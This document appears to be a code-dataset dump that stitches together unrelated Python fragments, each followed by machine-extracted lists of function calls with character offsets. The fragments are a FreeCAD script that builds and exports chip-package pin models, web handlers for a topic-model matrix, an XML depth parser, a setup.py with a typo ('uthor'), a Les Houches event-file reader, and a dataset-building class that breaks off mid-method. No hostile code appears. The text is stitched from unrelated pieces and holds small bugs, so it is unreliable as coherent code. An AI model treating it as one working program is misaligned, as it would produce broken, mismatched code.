Draft.array(App.getDocument("Unnamed").getObject("VerticalPin"),
App.Vector(0, pitch, 0),
App.Vector(length-sizePiny, 0, 0),
nVerticalPins, 2)
Gui.activateWorkbench("PartWorkbench")
shapesToFuse=[]
for obj in FreeCAD.ActiveDocument.Objects:
if obj.Name.find("VerticalPin") != -1:
Gui.Selection.addSelection(obj)
shapesToFuse.append(obj)
App.activeDocument().addObject("Part::MultiFuse","VerticalFusion")
App.activeDocument().VerticalFusion.Shapes = shapesToFuse
App.ActiveDocument.recompute()
fuse = FreeCAD.ActiveDocument.getObject("VerticalFusion")
fuse.Placement = App.Placement(
App.Vector(-width / 2., -((nVerticalPins-1) * pitch / 2.0 + sizePinx / 2.), 0),
App.Rotation(0,0,0,1))
if mode == 'QFN':
# create the exposed pad
App.ActiveDocument.addObject("Part::Box","EPAD")
App.ActiveDocument.recompute()
FreeCAD.getDocument("Unnamed").getObject("EPAD").Length = sizeEpadx
FreeCAD.getDocument("Unnamed").getObject("EPAD").Width = sizeEpady
FreeCAD.getDocument("Unnamed").getObject("EPAD").Height = sizePinz
App.ActiveDocument.getObject("EPAD").Placement = App.Placement(
App.Vector(-sizeEpadx/2., -sizeEpady/2., 0),
App.Rotation(0, 0, 0, 1))
App.ActiveDocument.recompute()
Gui.ActiveDocument.getObject("Pad").Visibility=True
## Export as a step model
exp_objects = []
for obj in FreeCAD.ActiveDocument.Objects:
# select all but indivudial Spheres and Sketch
if (obj.Name.find("Pin") == -1) and (obj.Name.find("Sketch") == -1):
Gui.Selection.addSelection(obj)
exp_objects.append(obj)
else:
FreeCAD.ActiveDocument.removeObject(obj.Name)
App.activeDocument().addObject("Part::MultiFuse","Fusion2")
App.activeDocument().Fusion2.Shapes = exp_objects
App.ActiveDocument.recompute()
for obj in exp_objects:
FreeCAD.ActiveDocument.removeObject(obj.Name)
exp_objects= []
exp_objects.append(FreeCAD.ActiveDocument.getObject("Fusion2"))
ImportGui.export(exp_objects,os.path.join(directory, name + '.step'))
del exp_objects
# Scale to mil before export to VRML for KiCAD use
Draft.scale(FreeCAD.ActiveDocument.ActiveObject,
FreeCAD.Vector(MMTOMIL, MMTOMIL, MMTOMIL))
FreeCAD.ActiveDocument.removeObject("Fusion2")
### Export as a VRML model
exp_objects = []
exp_objects.append(FreeCAD.ActiveDocument.getObject("Scale"))
FreeCADGui.export(exp_objects,os.path.join(directory, name + '.wrl'))
del exp_objects
exit(1)
| [
"FreeCAD.ActiveDocument.getObject",
"os.path.join",
"FreeCAD.ActiveDocument.removeObject",
"FreeCAD.Vector",
"sys.path.append",
"FreeCAD.getDocument"
] | [((49, 88), 'sys.path.append', 'sys.path.append', (['"""/usr/lib/freecad/lib"""'], {}), "('/usr/lib/freecad/lib')\n", (64, 88), False, 'import sys\n'), ((3740, 3792), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""HorizontalFusion"""'], {}), "('HorizontalFusion')\n", (3772, 3792), False, 'import FreeCAD\n'), ((4849, 4899), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""VerticalFusion"""'], {}), "('VerticalFusion')\n", (4881, 4899), False, 'import FreeCAD\n'), ((6477, 6523), 'FreeCAD.ActiveDocument.removeObject', 'FreeCAD.ActiveDocument.removeObject', (['"""Fusion2"""'], {}), "('Fusion2')\n", (6512, 6523), False, 'import FreeCAD\n'), ((6116, 6161), 'FreeCAD.ActiveDocument.removeObject', 'FreeCAD.ActiveDocument.removeObject', (['obj.Name'], {}), '(obj.Name)\n', (6151, 6161), False, 'import FreeCAD\n'), ((6199, 6242), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""Fusion2"""'], {}), "('Fusion2')\n", (6231, 6242), False, 'import FreeCAD\n'), ((6273, 6312), 'os.path.join', 'os.path.join', (['directory', "(name + '.step')"], {}), "(directory, name + '.step')\n", (6285, 6312), False, 'import os\n'), ((6434, 6475), 'FreeCAD.Vector', 'FreeCAD.Vector', (['MMTOMIL', 'MMTOMIL', 'MMTOMIL'], {}), '(MMTOMIL, MMTOMIL, MMTOMIL)\n', (6448, 6475), False, 'import FreeCAD\n'), ((6589, 6630), 'FreeCAD.ActiveDocument.getObject', 'FreeCAD.ActiveDocument.getObject', (['"""Scale"""'], {}), "('Scale')\n", (6621, 6630), False, 'import FreeCAD\n'), ((6662, 6700), 'os.path.join', 'os.path.join', (['directory', "(name + '.wrl')"], {}), "(directory, name + '.wrl')\n", (6674, 6700), False, 'import os\n'), ((5900, 5945), 'FreeCAD.ActiveDocument.removeObject', 'FreeCAD.ActiveDocument.removeObject', (['obj.Name'], {}), '(obj.Name)\n', (5935, 5945), False, 'import FreeCAD\n'), ((2417, 2447), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2436, 2447), False, 'import FreeCAD\n'), ((2491, 2521), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2510, 2521), False, 'import FreeCAD\n'), ((2560, 2590), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2579, 2590), False, 'import FreeCAD\n'), ((2880, 2910), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2899, 2910), False, 'import FreeCAD\n'), ((2956, 2986), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (2975, 2986), False, 'import FreeCAD\n'), ((3031, 3061), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (3050, 3061), False, 'import FreeCAD\n'), ((4072, 4102), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (4091, 4102), False, 'import FreeCAD\n'), ((4146, 4176), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (4165, 4176), False, 'import FreeCAD\n'), ((4219, 4249), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (4238, 4249), False, 'import FreeCAD\n'), ((5175, 5205), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (5194, 5205), False, 'import FreeCAD\n'), ((5245, 5275), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (5264, 5275), False, 'import FreeCAD\n'), ((5314, 5344), 'FreeCAD.getDocument', 'FreeCAD.getDocument', (['"""Unnamed"""'], {}), "('Unnamed')\n", (5333, 5344), False, 'import FreeCAD\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from db.BOW_DB import BOW_DB
from db.LDA_DB import LDA_DB
from vis.TermTopicMatrix3 import TermTopicMatrix3
def index():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
return handler.GenerateResponse()
def GetTerms():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
data = handler.GetTerms()
dataStr = json.dumps(data, encoding='utf-8', indent=2, sort_keys=True)
response.headers['Content-Type'] = 'application/json'
return dataStr
def GetTopics():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
data = handler.GetTopics()
dataStr = json.dumps(data, encoding='utf-8', indent=2, sort_keys=True)
response.headers['Content-Type'] = 'application/json'
return dataStr
def GetTermTopicMatrix():
with BOW_DB() as bow_db:
with LDA_DB() as lda_db:
handler = TermTopicMatrix3(request, response, bow_db, lda_db)
data = handler.GetTermTopicMatrix()
dataStr = json.dumps(data, encoding='utf-8', indent=2, sort_keys=True)
response.headers['Content-Type'] = 'application/json'
return dataStr
| [
"db.BOW_DB.BOW_DB",
"vis.TermTopicMatrix3.TermTopicMatrix3",
"json.dumps",
"db.LDA_DB.LDA_DB"
] | [((509, 569), 'json.dumps', 'json.dumps', (['data'], {'encoding': '"""utf-8"""', 'indent': '(2)', 'sort_keys': '(True)'}), "(data, encoding='utf-8', indent=2, sort_keys=True)\n", (519, 569), False, 'import json\n'), ((818, 878), 'json.dumps', 'json.dumps', (['data'], {'encoding': '"""utf-8"""', 'indent': '(2)', 'sort_keys': '(True)'}), "(data, encoding='utf-8', indent=2, sort_keys=True)\n", (828, 878), False, 'import json\n'), ((1145, 1205), 'json.dumps', 'json.dumps', (['data'], {'encoding': '"""utf-8"""', 'indent': '(2)', 'sort_keys': '(True)'}), "(data, encoding='utf-8', indent=2, sort_keys=True)\n", (1155, 1205), False, 'import json\n'), ((187, 195), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (193, 195), False, 'from db.BOW_DB import BOW_DB\n'), ((357, 365), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (363, 365), False, 'from db.BOW_DB import BOW_DB\n'), ((665, 673), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (671, 673), False, 'from db.BOW_DB import BOW_DB\n'), ((983, 991), 'db.BOW_DB.BOW_DB', 'BOW_DB', ([], {}), '()\n', (989, 991), False, 'from db.BOW_DB import BOW_DB\n'), ((214, 222), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (220, 222), False, 'from db.LDA_DB import LDA_DB\n'), ((247, 298), 'vis.TermTopicMatrix3.TermTopicMatrix3', 'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (263, 298), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n'), ((384, 392), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (390, 392), False, 'from db.LDA_DB import LDA_DB\n'), ((417, 468), 'vis.TermTopicMatrix3.TermTopicMatrix3', 'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (433, 468), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n'), ((692, 700), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (698, 700), False, 'from db.LDA_DB import LDA_DB\n'), ((725, 776), 'vis.TermTopicMatrix3.TermTopicMatrix3', 'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (741, 776), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n'), ((1010, 1018), 'db.LDA_DB.LDA_DB', 'LDA_DB', ([], {}), '()\n', (1016, 1018), False, 'from db.LDA_DB import LDA_DB\n'), ((1043, 1094), 'vis.TermTopicMatrix3.TermTopicMatrix3', 'TermTopicMatrix3', (['request', 'response', 'bow_db', 'lda_db'], {}), '(request, response, bow_db, lda_db)\n', (1059, 1094), False, 'from vis.TermTopicMatrix3 import TermTopicMatrix3\n')] |
from xml.etree.ElementTree import XMLParser
class MaxDepth:
maxdepth = 0
depth = 0
# Called for each opening tag
def start(self, tag, attrib):
self.depth += 1
if self.depth > self.maxdepth:
self.maxdepth = self.depth
# Called for each closing tag
def end(self, tag):
self.depth -= 1
def close(self):
return self.maxdepth
def main():
# Root depth = 0
# Find maximum depth
lines = int(input())
xmldoc = ''.join(input() for _ in range(lines))
target = MaxDepth()
parser = XMLParser(target=target)
parser.feed(xmldoc)
maxdepth = parser.close() - 1 # 0-based
print(f'{maxdepth}')
if __name__ == '__main__':
main()
| [
"xml.etree.ElementTree.XMLParser"
] | [((573, 597), 'xml.etree.ElementTree.XMLParser', 'XMLParser', ([], {'target': 'target'}), '(target=target)\n', (582, 597), False, 'from xml.etree.ElementTree import XMLParser\n')] |
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 17:54:18 2015
@author: anderson
"""
from setuptools import setup
import io
import version
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
long_description = read('README.rst')
setup(name='pyspyke',
version=version.version,
description='Python Package to analyse Spyke',
long_description=long_description,
url='https://github.com/britodasilva/pyspyke.git',
uthor='<NAME>',
author_email='<EMAIL>',
license='MIT',
install_requires=['numpy','matplotlib','scipy','h5py','sklearn'],
zip_safe=False)
| [
"setuptools.setup",
"io.open"
] | [((456, 793), 'setuptools.setup', 'setup', ([], {'name': '"""pyspyke"""', 'version': 'version.version', 'description': '"""Python Package to analyse Spyke"""', 'long_description': 'long_description', 'url': '"""https://github.com/britodasilva/pyspyke.git"""', 'uthor': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""MIT"""', 'install_requires': "['numpy', 'matplotlib', 'scipy', 'h5py', 'sklearn']", 'zip_safe': '(False)'}), "(name='pyspyke', version=version.version, description=\n 'Python Package to analyse Spyke', long_description=long_description,\n url='https://github.com/britodasilva/pyspyke.git', uthor='<NAME>',\n author_email='<EMAIL>', license='MIT', install_requires=['numpy',\n 'matplotlib', 'scipy', 'h5py', 'sklearn'], zip_safe=False)\n", (461, 793), False, 'from setuptools import setup\n'), ((315, 351), 'io.open', 'io.open', (['filename'], {'encoding': 'encoding'}), '(filename, encoding=encoding)\n', (322, 351), False, 'import io\n')] |
import re
from typing import NamedTuple
import numpy as np
EVENT_TAG = '<event>'
INIT_TAG = '<init>'
INIT_END_TAG = '</init>'
FILE_END_TAG = '</LesHouchesEvents>'
class Parameters(NamedTuple):
id_a : int # IDBMUP(1)
id_b : int # IDBMUP(2)
energy_a : float # EBMUP(1)
energy_b : float # EBMUP(2)
pdfgup_a : int # PDFGUP(1)
pdfgup_b : int # PDFGUP(2)
pdfsup_a : int # PDFSUP(1)
pdfsup_b : int # PDFSUP(2)
weight : int # IDWTUP
nprup : int # NPRUP
xsecup : float # XSECUP(MAXPUP)
xerrup : float # XERRUP(MAXPUP)
xmaxup : float # XMAXUP(MAXPUP)
lprup : float # LPRUP(MAXPUP)
class Particle(NamedTuple):
pdgid : int # IDUP
status : int # ISTUP
mother_a : int # MOTHUP(1)
mother_b : int # MOTHUP(2)
color_a : int # ICOLUP(1)
color_b : int # ICOLUP(2)
px : float # PUP(1)
py : float # PUP(2)
pz : float # PUP(3)
E : float # PUP(4)
M : float # PUP(5)
lifetime : float # VTIMUP
spin : float # SPINUP
class Event(NamedTuple):
nparticles : int # NUP
subprocess : int # IDPRUP
weight : float # XWGTUP
scale : float # SCALUP
qedcoupling : float # AQEDUP
qcdcoupling : float # AQCDUP
particles : list # List of particles in the event
class Process(NamedTuple):
init : Parameters
events : list
# Reads LHEF file and stores the information in according classes
def ReadLHEF(filepath):
fp = open(filepath)
init = []
line = fp.readline()
while line.strip() != INIT_TAG: line = fp.readline()
line = fp.readline()
while line.strip() != INIT_END_TAG: # Reading the initialisation parameters
line = re.sub('\s+', ' ', line).strip().split(' ')
line = [float(i) for i in line]
init = init + line
line = fp.readline()
p = Process(Parameters(*init),[])
line = fp.readline()
while line.strip() != FILE_END_TAG: # Reading the events
if line.strip() == EVENT_TAG:
line = fp.readline()
line = re.sub('\s+', ' ', line).strip().split(' ')
line[0:2] = map(int, line[0:2])
line[2:6] = map(float, line[2:6])
e = Event(*line, [])
for i in range(e.nparticles):
line = fp.readline()
line = re.sub('\s+', ' ', line).strip().split(' ')
line[0:6] = map(int, line[0:6])
line[6:13] = map(float, line[6:13])
e.particles.append(Particle(*line))
p.events.append(e)
line = fp.readline()
return p | [
"re.sub"
] | [((1663, 1688), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'line'], {}), "('\\\\s+', ' ', line)\n", (1669, 1688), False, 'import re\n'), ((2019, 2044), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'line'], {}), "('\\\\s+', ' ', line)\n", (2025, 2044), False, 'import re\n'), ((2289, 2314), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'line'], {}), "('\\\\s+', ' ', line)\n", (2295, 2314), False, 'import re\n')] |
import random
import _jsonnet, json
import logging
import hashlib
import os
from copy import deepcopy
import pandas as pd
from tqdm import tqdm
import math
from LeapOfThought.resources.teachai_kb import TeachAIKB
from LeapOfThought.common.general import num2words1, bc
from LeapOfThought.common.data_utils import uniform_sample_by_column, pandas_multi_column_agg
# This is mainly for testing and debugging ...
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.width', 2000)
pd.set_option('display.max_colwidth', 200)
pd.set_option("display.colheader_justify","left")
import numpy as np
from LeapOfThought.common.file_utils import upload_jsonl_to_s3, save_jsonl_to_local, is_path_creatable
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger(__name__) # pylint: disable=invalid-name
class ArtiSet():
def __init__(self, args):
random.seed(17)
np.random.seed(1234)
self._np_seed = np.random.RandomState(17)
with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), args.config_path) ,'r') as f:
self._config = json.load(f)[self.artiset_name]
if args.__contains__('variant') and len(args.variant) > 0:
self._output_file = args.output_file.replace('.jsonl','_' + args.variant + '.jsonl')
if len(args.experiment_version) > 0:
self._output_file = self._output_file.replace('.jsonl', '_' + args.experiment_version + '.jsonl')
else:
self._output_file = args.output_file
self._split = args.split_by_field
self._incorrect_beliefs = None
if "incorrect_beliefs_file" in args and args.incorrect_beliefs_file:
with open(args.incorrect_beliefs_file, 'r') as file:
self._incorrect_beliefs = [json.loads(line.strip()) for line in file]
self._save_sample = args.save_sample
self.artiset_data = []
def append_teachyourai_format_example(self, example, do_print=False, append_to_list=None):
"""append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
(that must contain a "phrase", "answer") and converts it to a BooleanQA format
Args:
example (dict): an example containing question,answer,dist1,dist2 fields
do_print (bool): just for debuging
num_choices (int): number of choices in question (between 2 and 5)
append_to_list (list): a
Returns:
"""
if 'context' not in example:
example['context'] = ''
if 'id' not in example:
example['id'] = self.create_qid(example)
if do_print:
print('a:%s d1:%s d2:%s || Q:%s' % (example['phrase'], example['answer']))
if append_to_list is not None:
append_to_list.append(example)
else:
self.artiset_data.append(example)
@staticmethod
def create_qid(example):
m = hashlib.md5()
m.update(example['phrase'].encode())
m.update(example['context'].encode())
# boolean examples have binary answer (int 0 or 1)
m.update(str(example['answer']).encode())
return m.hexdigest()
def split_by_columns(self):
split_columns = self._split.split(',')
examples = self.examples_meta
indexes = {}
# check the split columns are in the data
if len(set(split_columns) - set(examples.columns)) != 0:
raise (ValueError("split columns used to split dev/test and train set do not exist the examples_meta!"))
all_objs = []
for split_column in split_columns:
all_objs += list(examples[split_column])
#best_train_inds, best_dev_inds, best_test_inds = [], [], []
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
if len(split_columns) > 1:
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
dev_test_examples = examples.iloc[test_inds + dev_inds]
dev_test_objs = []
for split_column in split_columns:
dev_test_objs += list(dev_test_examples[split_column])
dev_test_objs = pd.Series(list(set(dev_test_objs)))
else:
# We'll choice the test-dev examples from values of split that have the lowest number of examples.
# this will insure we are choosing to highest amount of training examples that are still disjoint on split_columns[0] from dev+test
split_columns_value_counts = examples[split_columns[0]].value_counts().sort_values().cumsum().reset_index()
start_ind = split_columns_value_counts[split_columns_value_counts[split_columns[0]] > \
sum(self._config['test_dev_size'])].index[0] + 1
dev_test_objs = list(split_columns_value_counts['index'][0:start_ind])
dev_test_examples = examples[examples[split_columns[0]].isin(dev_test_objs)]
inds = list(dev_test_examples.index)
test_inds = random.sample(inds, self._config['test_dev_size'][0])
inds = list(set(inds) - set(test_inds))
dev_inds = random.sample(inds, self._config['test_dev_size'][1])
for split_column in split_columns:
indexes[split_column] = examples.set_index(split_column)
dev_ids = set()
not_in_train_ids = set()
for split_column in split_columns:
dev_ids = dev_ids & set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
not_in_train_ids = not_in_train_ids | set(indexes[split_column][indexes[split_column].index.isin(dev_test_objs)]['qid'])
train_examples = examples.loc[~examples['qid'].isin(not_in_train_ids), :]
train_inds = list(train_examples.index)
if len(train_inds) > self._config['max_number_of_examples']:
train_inds = train_inds[0:self._config['max_number_of_examples']]
random.shuffle(train_inds)
print("total dev-test examples available: %d" % (len(dev_test_examples)))
print("split produced %d training examples" % (len(train_inds)))
return train_inds, dev_inds, test_inds
def save_dataset(self):
"""save_dataset() automatically saves the artiset
if the config output_file contains the string _sample.jsonl it will be saved in a more readable format
otherwise it will split the examples in self.artiset_data into train, dev, test and save them in s3
if output_file startswith s3:// otherwise locally. (If output_file is empty, it will not save)
Args:
arg1 (int): Description of arg1
arg2 (str): Description of arg2
Returns:
bool: Description of return value
"""
# Move non-required columns to metadata:
artiset_data_with_metadata = []
for example in self.artiset_data:
if 'metadata' not in example:
new_example = {'metadata':{}}
else:
new_example = {'metadata': example['metadata']}
new_example.update({k:example[k] for k in ['id', 'phrase', 'context', 'answer']})
new_example['metadata'].update({k: example[k] for k in set(example.keys()) - {'id', 'phrase', 'context', 'answer','metadata'}})
artiset_data_with_metadata.append(new_example)
self.artiset_data = artiset_data_with_metadata
# splitting
if len(self._split) > 0:
train_inds, dev_inds, test_inds = self.split_by_columns()
elif 'split' in self.examples_meta:
test_inds = list(self.examples_meta[self.examples_meta['split'] == 'test'].index)
dev_inds = list(self.examples_meta[self.examples_meta['split'] == 'dev'].index)
train_inds = list(self.examples_meta[self.examples_meta['split'] == 'train'].index)
random.seed(17)
random.shuffle(train_inds)
#random.shuffle(test_inds)
#random.shuffle(dev_inds)
test_inds = test_inds[0: self._config['test_dev_size'][0]]
dev_inds = dev_inds[0:self._config['test_dev_size'][1]]
train_inds = train_inds[0:self._config['max_number_of_examples']]
else:
inds = [i for i in range(len(self.artiset_data))]
random.seed(17)
random.shuffle(inds)
test_inds = inds[0:self._config['test_dev_size'][0]]
dev_inds = inds[self._config['test_dev_size'][0]:sum(self._config['test_dev_size'])]
train_inds = inds[sum(self._config['test_dev_size']):]
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
if self._save_sample:
if 'split' in self.examples_meta.columns:
logger.info(f"size of each split:\n{self.examples_meta['split'].value_counts()}")
random.seed(17)
if len(self.artiset_data) > 100:
self.artiset_data = random.sample(self.artiset_data,100)
save_func(self._output_file, self.artiset_data, sample_indent=self._save_sample)
else:
logger.info('uploading %d,%d,%d test,dev,train examples' % (len(test_inds),len(dev_inds),len(train_inds)))
save_func(self._output_file.replace('.jsonl', '_test.jsonl'), [self.artiset_data[i] for i in test_inds])
save_func(self._output_file.replace('.jsonl', '_dev.jsonl'), [self.artiset_data[i] for i in dev_inds])
save_func(self._output_file.replace('.jsonl', '_train.jsonl'), [self.artiset_data[i] for i in train_inds])
if len(self.examples_meta) > 0:
save_func(self._output_file.replace('.jsonl', '_meta.jsonl'), self.examples_meta.to_dict(orient='rows'))
return train_inds, dev_inds, test_inds
def save_single_split(self, split_data, split):
inds = [i for i in range(len(split_data))]
random.seed(17)
random.shuffle(inds)
if self._output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(self._output_file) and len(self._output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = self._output_file.find('_sample') > -1
save_func(self._output_file.replace('.jsonl', '_' + split + '.jsonl'), [split_data[i] for i in inds], sample_indent=si)
def save_aux_data(self, output_file, data):
if output_file.startswith('s3://'):
save_func = upload_jsonl_to_s3
elif is_path_creatable(output_file) and len(output_file) > 0:
save_func = save_jsonl_to_local
else:
# Do nothing
return
si = output_file.find('_sample') > -1
save_func(output_file, data, sample_indent=si)
def build_artificial_dataset(self,args):
pass
def resplit(self, args):
logger.error('Not implemented for this artiset')
def build_statement_rule_property_examples(self, examples, split, statement_tag='statement', ablate_same_distractor_fields = 1.0,\
rule_tags=['implicit_rule','property'], distractor_tags = ['distractors'], ablation_list=[], use_shorthand=False, \
nlg_sampling=False, reverse_validity_frac=0):
# computing ID before ablations on the statement and rule tags:
for i, example in enumerate(examples):
m = hashlib.md5()
# note that the tags for ID creation are always the same!
for tag in [statement_tag] + rule_tags:
if tag in example:
if type(example[tag]) == list:
for e in example[tag]:
m.update(e['subject'].encode())
m.update(e['predicate'].encode())
m.update(e['object'].encode())
m.update(e['validity'].encode())
else:
m.update(example[tag]['subject'].encode())
m.update(example[tag]['predicate'].encode())
m.update(example[tag]['object'].encode())
m.update(example[tag]['validity'].encode())
example['id'] = m.hexdigest()
# Ablations
# now that all the examples are ready, we can ablate as needed:
random.seed(17)
for ablation in ablation_list:
if len(ablation) == 3:
fields, fraction, condition = ablation
examples_cands = [e for e in examples if e[condition[0]] in condition[1]]
else:
fields, fraction = ablation
examples_cands = examples
example_to_ablate = random.sample(examples_cands, int(fraction * float(len(examples))))
for e in example_to_ablate:
for field in fields:
if field in e:
del e[field]
# for every field we ablate we must ablate the same field from distractors!
if random.random() < ablate_same_distractor_fields:
for distractor_tag in distractor_tags:
if distractor_tag in e:
if field in e[distractor_tag]:
del e[distractor_tag][field]
random.seed(17)
for i, example in enumerate(examples):
context_rules = []
# adding actual rules
for rule_tag in rule_tags:
if rule_tag in example:
rules = example[rule_tag]
if not type(rules) == list:
rules = [rules]
for rule in rules:
reverse_validity = not rule['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(rule,
is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand, nlg_sampling=nlg_sampling))
# adding distractors
for rule_tag in distractor_tags:
if rule_tag in example:
for field, tag_distractors in example[rule_tag].items():
for rule in tag_distractors:
rule_list = rule
if not type(rule_list) == list:
rule_list = [rule_list]
for r in rule_list:
reverse_validity = not r['validity'] == 'always true'
context_rules.append(TeachAIKB().to_pseudo_language(r, is_rule=True, reverse_validity=reverse_validity,
use_shorthand=use_shorthand,
nlg_sampling=nlg_sampling))
use_hypothetical_statement = False
if 'is_hypothetical_statement' in example and example['is_hypothetical_statement']:
use_hypothetical_statement = True
answer = 1 if example[statement_tag]['validity'] == 'always true' else 0
if self.variant != 'statement_subject_lang_selectivity':
if random.random() < reverse_validity_frac:
answer = 1 - answer
reverse_validity = True
else:
reverse_validity = False
phrase = TeachAIKB().to_pseudo_language(example[statement_tag], is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling, reverse_validity=reverse_validity)
else:
statement_dict = deepcopy(example[statement_tag])
statement_dict['subject'] = random.sample(['foo','blah','ya','qux','aranglopa','foltopia','cakophon','baz','garply'], 1)[0]
phrase = TeachAIKB().to_pseudo_language(statement_dict, is_rule=False, use_shorthand=use_shorthand,
use_hypothetical_statement=use_hypothetical_statement,
nlg_sampling=nlg_sampling)
# creating a unique set of rules that does not include the statement.
context_rules = list(set(context_rules))
# set order is random!! so we need to fix the order the get a replicable order.
context_rules = sorted(context_rules)
random.shuffle(context_rules)
example.update({'phrase': phrase, \
'answer': answer,
'context': ' '.join(context_rules),
'split': split,
'rules': context_rules})
# append_teachyourai_format_example() is method implemented in ArtiSet class and takes an example dict
# (that must contain a "phrase", "answer") and converts it to a BooleanQA format
self.append_teachyourai_format_example(example, do_print=False)
self.examples_meta.append(deepcopy(example))
def print_examples(self, sample):
random.seed(7)
example_inds = random.sample(range(len(self.artiset_data)), sample)
## Printing a sample!
for ind in example_inds:
example = self.artiset_data[ind]
if 'statement' in example:
statement = example['statement']
rules = '\n'.join(example['rules'])
e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{rules} "
e = e.replace(statement['object'], f"{bc.Blue}{statement['object']}{bc.ENDC}")
e = e.replace(statement['predicate'], f"{bc.Green}{statement['predicate']}{bc.ENDC}")
e = e.replace(str(statement['subject']), f"{bc.Magenta}{statement['subject']}{bc.ENDC}")
if 'hypernym' in example:
hypernym = example['hypernym']['object']
e = e.replace(str(hypernym), f"{bc.Cyan}{hypernym}{bc.ENDC}")
e = e.replace('not', f"{bc.Red}not{bc.ENDC}")
e = e.replace('type', f"{bc.Yellow}type{bc.ENDC}")
if 'num_of_instances' in example:
e = e.replace(' ' + num2words1[example['num_of_instances']].lower() + ' ' \
, f"{bc.Red} {num2words1[example['num_of_instances']].lower()} {bc.ENDC}")
for number in 'one', 'two', 'three', 'four', 'five':
e = e.replace(' ' + number + ' ', f"{bc.Cyan} {number} {bc.ENDC}")
else:
e = f"{example['id']}({example['split']}):\n{bc.BOLD}Q:{bc.ENDC}{example['phrase']} {bc.BOLD}A:{bc.ENDC}{example['answer']}\n{bc.BOLD}C:{bc.ENDC}{example['context']} "
print(e + '\n')
def create_subject_filter_lookup(self, examples, sample_on=None, avoid_mixing=None):
if sample_on is not None:
triplets_to_sample_on = [e[sample_on] for e in examples]
else:
triplets_to_sample_on = examples
# building subject filter lookup:
subject_filter_lookup = {}
rules_to_sample_df = pd.DataFrame(triplets_to_sample_on)
for curr_subject, matching_records in tqdm(rules_to_sample_df.groupby('subject')):
subject_to_filter = {curr_subject}
if avoid_mixing is not None and 'predicates' in avoid_mixing:
subject_to_filter |= set(
rules_to_sample_df[~rules_to_sample_df['predicate'].isin(set(matching_records['predicate']))]['subject'])
